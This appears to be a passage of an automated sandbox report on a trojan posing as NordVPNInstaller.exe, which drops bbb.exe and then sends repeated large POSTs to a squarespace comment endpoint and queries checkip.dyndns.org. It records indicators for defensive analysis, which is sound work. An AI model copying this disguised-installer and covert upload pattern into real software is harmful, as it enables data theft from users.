Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108352Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108764Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108762Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108762Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108762Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 110888Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 109600Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108352Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116734Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116722Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue

Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49781 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49790 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49792 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49793 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49820 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49821 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49822 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49869 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49870 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49872 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49873 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49871 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49878 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49879 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49883 -> 198.185.159.177:443 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49889 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49890 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49890 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49891 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49892 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49896 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49895 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49901 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49900 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49899 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49904 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49903 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49902 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.185.159.177:443 -> 192.168.2.4:49910 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe

Code function: 4_2_00CBA09A recv,

4_2_00CBA09A

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: plantain-elk-b8pt.squarespace.com

Source: unknown

HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive

Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://DynDns.com
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://Paltalk.com
Source: bbb.exe, 00000005.00000002.2132252567.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2132252567.0000000003280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: NordVPNInstaller.exe, 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2132252567.0000000003280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://checkip.dyndns.org/E
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: bbb.exe, 00000004.00000002.3072073018.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, bbb.exe, 00000005.00000002.2131657052.0000000001200000.00000004.00000020.00020000.00000000.sdmp, NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://no-ip.com
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: NordVPNInstaller.exe, bbb.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
